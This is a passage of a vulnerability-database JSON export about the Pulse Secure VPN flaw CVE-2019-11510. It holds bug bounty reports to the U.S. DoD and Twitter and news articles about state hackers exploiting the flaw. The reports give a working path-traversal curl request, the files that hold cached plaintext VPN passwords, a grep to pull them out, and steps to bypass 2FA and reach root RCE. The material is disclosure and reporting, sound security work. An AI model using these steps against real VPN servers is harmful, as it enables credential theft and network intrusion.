2588\u2588\u2588\n\u2588\u2588\u2588\u2588145.118\tac0hqwsap06p.rsn.aac\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588144.95\tikrome\u2588\u2588\u2588\u2588 ft1ikrome\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588144.91\tAuth\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588144.216\tac0hqc2a0a3b010.rsn.aac\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588197.16\tacft1a0xxb5l005\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588197.15\tacft1a0xxb5l004\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588196.62\tft1ccimm\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588196.28\tft1auth\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588195.247\tac0hldbxx02t\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588195.246\tac0hldbxx01t\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588195.195\tac0hxzndb04t-01\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588195.188\tac0hxznap04t-03\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588195.158\tac0hxznxx24t-02\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588195.133\tft1internal\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588195.127\tac0hxznap03t-03\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588194.78\tws13t.soa\u2588\u2588\u2588\u2588\u2588 ws14t.soa\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588194.165\tft1ensq\u2588\u2588\u2588 ac0hxznxx03t-08-ensq_wls1\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588194.119\trmdwebtopft1\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n```\n\n\nWe can grab any other file on this system:\n\n```\n/data/runtime/mtmp/system\n/data/runtime/mtmp/lmdb/dataa/data.mdb\n/data/runtime/mtmp/lmdb/dataa/lock.mdb\n/data/runtime/mtmp/lmdb/randomVal/data.mdb\n/data/runtime/mtmp/lmdb/randomVal/lock.mdb\n```\n\nThe VPN user and hashed passwords are stored in the `mtmp/system` file, but when users log into the application, it caches the plain-text password into `dataa/data.mdb`. \n\n```\ngrep 'password@9' data.mdb -a\n```\n\nwill get you a load of plain-text passwords\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Product, Version, and Configuration (If applicable)\nhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n\n## Suggested Mitigation/Remediation Actions\nUpdate the Pulse Connect Secure VPN\n\n## Impact\n\nCritical, an attacker can get code execution with this vulnerability.\n\n## References:\nhttps://hackerone.com/reports/591295\n\nThanks,\nCorben (@cdl)", "modified": "2019-12-02T19:46:35", "id": "H1:671857", "href": "https://hackerone.com/reports/671857", "published": "2019-08-12T18:42:25", "type": "hackerone", "title": "U.S. Dept Of Defense: [CVE-2019-11510 ] Path Traversal on \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 leads to leaked passwords, RCE, etc", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-02T21:26:28", "bulletinFamily": "bugbounty", "cvelist": ["CVE-2019-11508", "CVE-2019-11510", "CVE-2019-11538", "CVE-2019-11539", "CVE-2019-11540", "CVE-2019-11542"], "bounty": 0.0, "description": "##Description\nHello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:\n**CVE-2019-11510 - Pre-auth Arbitrary File Reading**\nCVE-2019-11542 - Post-auth Stack Buffer Overflow\n**CVE-2019-11539 - Post-auth Command Injection**\nCVE-2019-11538 - Post-auth Arbitrary File Reading\n**CVE-2019-11508 - Post-auth Arbitrary File Writing**\nCVE-2019-11540 - Post-auth Session Hijacking\n\nLink to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf\n\nI discovered that https://\u2588\u2588\u2588\u2588 instance is vulnerable to described vulnerabilities.\n\n##POC\nExtracting `/etc/passwd` as example:\n```\ncurl -i -k --path-as-is https://\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/\n```\n{F561180}\n\nThe RCE can be achieved with this chain:\n1) Pulse Secure stores credentials in the cleartext.\n2) Attacker reads credentials via CVE-2019-11510 (it stored in the `/data/runtime/mtmp/lmdb/dataa/data.mdb`) and authorizes on VPN\n3) Attacker exploits CVE-2019-11539 - Post-auth Command Injection achieving RCE as root.\n\n##Suggested fix\nUpdate the Pulse Secure SSL VPN software (also implementing certificate validation can harden access a bit if some similar CVEs will be discovered in future).\n\n## Impact\n\nRemote code execution as root (by reading plaintext credentials and then exploiting CVE-2019-11539 - Post-auth Command Injection) and accessing intranet behind VPN.", "modified": "2019-12-02T19:59:54", "id": "H1:678496", "href": "https://hackerone.com/reports/678496", "published": "2019-08-21T13:03:00", "type": "hackerone", "title": "U.S. Dept Of Defense: Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://\u2588\u2588\u2588", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-10T15:53:38", "bulletinFamily": "bugbounty", "cvelist": ["CVE-2019-11508", "CVE-2019-11510", "CVE-2019-11538", "CVE-2019-11539", "CVE-2019-11540", "CVE-2019-11542"], "bounty": 20160.0, "description": "Hi, we(Orange Tsai and Meh Chang) are the security research team from DEVCORE. Recently, we are doing a research about SSL VPN security, and found several critical vulnerabilities on Pulse Secure SSL VPN! We have reported to vendor and [patches](https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101) have been released on `2019/4/25`. Since that, we keep monitoring numerous large corporations using Pulse Secure and we noticed that Twitter haven't patched the SSL VPN server over one month!\n\nThese vulnerabilities include a pre-auth file reading(CVSS 10) and a post-auth(admin) command injection(CVSS 8.0) which can be chained into a pre-auth RCE! Here are all vulnerabilities we found:\n\n* CVE-2019-11510 - Pre-auth Arbitrary File Reading\n* CVE-2019-11542 - Post-auth Stack Buffer Overflow\n* CVE-2019-11539 - Post-auth Command Injection\n* CVE-2019-11538 - Post-auth Arbitrary File Reading\n* CVE-2019-11508 - Post-auth Arbitrary File Writing\n* CVE-2019-11540 - Post-auth Session Hijacking\n\n\n## Our Steps\n\nFirst, we download following files with CVE-2019-11510:\n1. `/etc/passwd`\n2. `/etc/hosts`\n3. `/data/runtime/mtmp/system`\n4. `/data/runtime/mtmp/lmdb/dataa/data.mdb`\n5. `/data/runtime/mtmp/lmdb/dataa/lock.mdb`\n6. `/data/runtime/mtmp/lmdb/randomVal/data.mdb`\n7. `/data/runtime/mtmp/lmdb/randomVal/lock.mdb`\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n\nThe VPN user and hashed passwords are stored in the file `mtmp/system`. However, Pulse Secure caches the plain-text password in the `dataa/data.mdb` once the user log-in. Here, we just grep part of username/plain-text-password for proofs and further actions.\n\n*P.S. we mask the password field for security concerns, and we can send to you if you provide your PGP key.*\n\n```\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 / \u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 / \u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 / \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 / \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588 / \u2588\u2588\u2588\u2588\u2588\u2588\n```\n\nOnce we log into the SSL VPN, we found the server has enabled the Two-Factor Authentication. Here, we listed two methods to bypass the 2FA:\n\n\u2588\u2588\u2588\u2588\n\n1. We observed Twitter using the 2FA solution from Duo.com. With the file `mtmp/system`, we could obtain the integration key, secret key, and API hostname, which should be protected carefully according to the [Duo documentation](https://duo.com/docs/pulseconnect):\n\n > Treat your secret key like a password\n The security of your Duo application is tied to the security of your secret key (skey). Secure it as you would any sensitive credential. Don't share it with unauthorized individuals or email it to anyone under any circumstances!\n\n ```\n # secret-key = \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n \u2588\u2588\u2588\u2588\n dc=\u2588\u2588\u2588,dc=duosecurity,dc=com\n cn=<USER>\n\n # LDAP password = \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n \u2588\u2588\u2588\u2588\u2588\n \u2588\u2588\u2588\u2588\u2588\u2588\u2588\n uid=<username>\n ```\n\n2. The Pulse Secure stores the user session in the `randomVal/data.mdb`. Without `Roaming Session` option enabled, we can reuse the session and log into your SSL VPN!\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n\n\nThe next, in order to trigger the command injection(CVE-2019-11542). We leverage the web proxy function to access the admin interface with following URL:\n\n```\nhttps://0/admin/\n```\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\nWe are now trying to crack the admin hash by GPU. It seems takes a long time, but once we cracked, we can achieve RCE absolutely. Actually, we can simply wait for the admin login and obtain the plain-text password directly!\n```\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n```\n\nAnyway, we decided to report to you first, because it's lethal and critical. If you want, we can provide the RCE PoC in admin interface in order to proof the potential risk!\n\n\n## Impact:\n\n1. Access Intranet(we have accessed the `\u2588\u2588\u2588\u2588\u2588\u2588\u2588` for proof) \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n2. Plenty of staff plain-text passwords\n3. Internal server and passwords(such as the LDAP)\n4. Attack back all VPN clients(we will detail the step in [Black Hat USA 2019](https://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa---pre-auth-rce-on-leading-ssl-vpns-15545))\n5. Private keys\n6. Sensitive cookies in Web VPN(such as okta, salesforce, box.com and google)\n\n## Supporting Material/References:\n\nWe attached screenshots to proof our actions. For security concern, we didn't attach the `mtmp/system` and the `dataa/data.mdb`. If you want, we can send to you with your PGP key encrypted!\n\n## Recommend Solution\n\nThe only and simplest way to solve this problem is to upgrade your SSL VPN to the [latest version](https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101)!\n\n## Impact\n\n1. Access Intranet(we have accessed the `\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588` for proof) \u2588\u2588\u2588\u2588\n2. Plenty of staff plain-text passwords\n3. Internal server and passwords(such as the LDAP)\n4. Attack back all VPN clients(we will detail the step in [Black Hat USA 2019](https://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa---pre-auth-rce-on-leading-ssl-vpns-15545))\n5. Private keys\n6. Sensitive cookies in Web VPN(such as okta, salesforce, box.com and google)", "modified": "2019-08-10T15:06:45", "id": "H1:591295", "href": "https://hackerone.com/reports/591295", "published": "2019-05-28T07:53:44", "type": "hackerone", "title": "Twitter: Potential pre-auth RCE on Twitter VPN", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2019-09-21T09:45:20", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-11510"], "description": "File disclosure vulnerability in Pulse Connect Secure SSL VPN\n\nVulnerability Type: File Disclosure", "modified": "2019-08-27T00:00:00", "published": "2019-08-27T00:00:00", "id": "E-688", "href": "", "type": "dsquare", "title": "Pulse Connect Secure File Disclosure", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2020-04-17T11:56:14", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510"], "description": "[](<https://thehackernews.com/images/-_SvUUuvh0ss/XpmKGXtsseI/AAAAAAAAAPI/SuMNxubahJUd3z_eE6vcjjgsuPoYjkdawCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability-2.jpg>)\n\nThe United States Cybersecurity and Infrastructure Security Agency (CISA) yesterday issued a [fresh advisory](<https://www.us-cert.gov/ncas/alerts/aa20-107a>) alerting organizations to change all their Active Directory credentials as a defense against cyberattacks trying to leverage a known remote code execution (RCE) vulnerability in Pulse Secure VPN servers\u2014even if they have already patched it. \n \nThe warning comes three months after another [CISA alert](<https://www.us-cert.gov/ncas/alerts/aa20-010a>) urging users and administrators to [patch Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>) environments to thwart attacks exploiting the vulnerability. \n \n\"Threat actors who successfully exploited CVE-2019-11510 and stole a victim organization's credentials will still be able to access \u2014 and move laterally through \u2014 that organization's network after the organization has patched this vulnerability if the organization did not change those stolen credentials,\" CISA said. \n\n\n \nCISA has also [released a tool to help](<https://github.com/cisagov/check-your-pulse>) network administrators look for any indicators of compromise associated with the flaw. \n \n\n\n## A Remote Code Execution Flaw\n\n \nTracked as [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), the pre-authentication arbitrary file read vulnerability could allow remote unauthenticated attackers to compromise vulnerable VPN servers and gain access to all active users and their plain-text credentials, and execute arbitrary commands. \n \n\n\n[](<https://thehackernews.com/images/-9lA8I2RLHGU/XpmBkUgmolI/AAAAAAAA2qg/xhY8D8d5TDs7mVoKQo3kFZmB8fmEu1yvwCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability.jpg>)\n\n \nThe flaw stems from the fact that [directory traversal](<https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/>) is hard-coded to be allowed if a path contains \"dana/html5/acc,\" thus allowing an attacker to send specially crafted URLs to read sensitive files, such as \"/etc/passwd\" that contains information about each user on the system. \n \nTo address this issue, Pulse Secure released an [out-of-band patch](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) on April 24, 2019. \n \n[](<https://thehackernews.com/images/-JoiStCZj61c/XpmChlfPXpI/AAAAAAAAAO8/x_r1K3sIkukYxwR0UcxXPcNLaxvuDvrmQCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability-1.jpg>) \n \nWhile on August 24, 2019, security intelligence firm Bad Packets was able to discover [14,528 unpatched](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) Pulse Secure servers, a subsequent scan as of last month yielded [2,099 vulnerable endpoints](<https://twitter.com/bad_packets/status/1242289478334427139>), indicating that a vast majority of organizations have patched their VPN gateways. \n \n\n\n## Unpatched VPN Servers Become Lucrative Target\n\n \nThe fact that there are still over thousands of unpatched Pulse Secure VPN servers has made them a lucrative target for bad actors to distribute malware. \n \nA report from ClearSky found Iranian state-sponsored [hackers using CVE-2019-11510](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>), among others, to penetrate and steal information from target IT and telecommunication companies across the world. \n \nAccording to an [NSA advisory](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>) from October 2019, the \"exploit code is freely available online via the Metasploit framework, as well as GitHub. Malicious cyber actors are actively using this exploit code.\" \n\n\n \nIn a similar alert issued last year, the UK's National Cyber Security Centre ([NCSC](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)) warned that advanced threat groups are exploiting the vulnerability to target government, military, academic, business, and healthcare organizations. \n \nMore recently, [Travelex](<https://www.bbc.com/news/business-51017852>), the foreign currency exchange and travel insurance firm, became a victim after cybercriminals planted Sodinokibi (REvil) [ransomware](<https://doublepulsar.com/big-game-ransomware-being-delivered-to-organisations-via-pulse-secure-vpn-bd01b791aad9>) on the company's networks via the Pulse Secure vulnerability. Although the ransomware operators demanded a ransom of $6 million (\u00a34.6 million), a [Wall Street Journal](<https://www.wsj.com/articles/travelex-paid-hackers-multimillion-dollar-ransom-before-hitting-new-obstacles-11586440800>) report last week said it paid $2.3 million in the form of 285 Bitcoin to resolve its problem. \n \nIn the face of ongoing attacks, it's recommended that organizations upgrade their Pulse Secure VPN, reset their credentials, and scan for unauthenticated log requests and exploit attempts. \n \nCISA has also suggested removing any unapproved remote access programs and inspecting scheduled tasks for scripts or executables that may allow an attacker to connect to an environment. \n \nFor more steps to mitigate the flaw, head to [NSA's advisory here](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>).\n", "modified": "2020-04-17T11:20:03", "published": "2020-04-17T11:20:00", "id": "THN:46994B7A671ED65AD9975F25F514C6E3", "href": "https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html", "type": "thn", "title": "CISA Warns Patched Pulse Secure VPNs Could Still Expose Organizations to Hackers", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-18T15:48:20", "bulletinFamily": "info", "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "description": "[](<https://1.bp.blogspot.com/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n\n\n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://1.bp.blogspot.com/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-control command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n\n\n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[](<https://1.bp.blogspot.com/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "modified": "2020-02-18T15:13:08", "published": "2020-02-18T15:06:00", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-15T09:43:41", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "description": "[](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n\n\n[](<https://go.thn.li/contrast> \"cybersecurity\" )\n\n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. \n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n\n\n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. \n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "modified": "2020-09-15T09:14:30", "published": "2020-09-15T09:14:00", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-21T18:40:07", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "description": "[](<https://thehackernews.com/images/-HxsxXCBkPXE/YH-natH6OTI/AAAAAAAACUA/6_XHWg-Cu_YYS4p-8w6I8XWh3VRUU9ZMQCLcBGAsYHQ/s0/pulse-secure-hacking.jpg>)\n\nIf Pulse Connect Secure gateway is part of your organization network, you need to be aware of a newly discovered critical zero-day authentication bypass vulnerability (CVE-2021-22893) that is currently being exploited in the wild and for which there is no patch available yet.\n\nAt least two threat actors have been behind a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in Pulse Secure VPN devices to circumvent multi-factor authentication protections and breach enterprise networks.\n\n\"A combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), are responsible for the initial infection vector,\" cybersecurity firm FireEye [said](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) on Tuesday, identifying 12 malware families associated with the exploitation of Pulse Secure VPN appliances.\n\n[](<https://go.thn.li/1-300-6> \"password auditor\" )\n\nThe company is also tracking the activity under two threat clusters UNC2630 and UNC2717 (\"[UNC](<https://www.fireeye.com/blog/products-and-services/2020/12/how-mandiant-tracks-uncategorized-threat-actors.html>)\" for Uncategorized) \u2014 the former linked to a break-in of U.S. Defense Industrial base (DIB) networks, while the latter was found targeting a European organization in March 2021 \u2014 with the investigation attributing UNC2630 to operatives working on behalf of the Chinese government, in addition to suggesting possible ties to another espionage actor [APT5](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt5>) based on \"strong similarities to historic intrusions dating back to 2014 and 2015.\"\n\n[](<https://thehackernews.com/images/-_r1BkPmCUK8/YH-n1A6EuZI/AAAAAAAACUI/MS0JCaPy_hEkXJpAquULKRANPrKeNuL_gCLcBGAsYHQ/s728/vpn-hacking.jpg>)\n\nAttacks staged by UNC2630 are believed to have commenced as early as August 2020, before they expanded in October 2020, when UNC2717 began repurposing the same flaws to install custom malware on the networks of government agencies in Europe and the U.S. The incidents continued until March 2021, according to FireEye.\n\nThe list of malware families is as follows -\n\n * **UNC2630** \\- SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK\n * **UNC2717** \\- HARDPULSE, QUIETPULSE, AND PULSEJUMP\n\nTwo additional malware strains, STEADYPULSE and LOCKPICK, deployed during the intrusions have not been linked to a specific group, citing lack of evidence.\n\nBy exploiting multiple Pulse 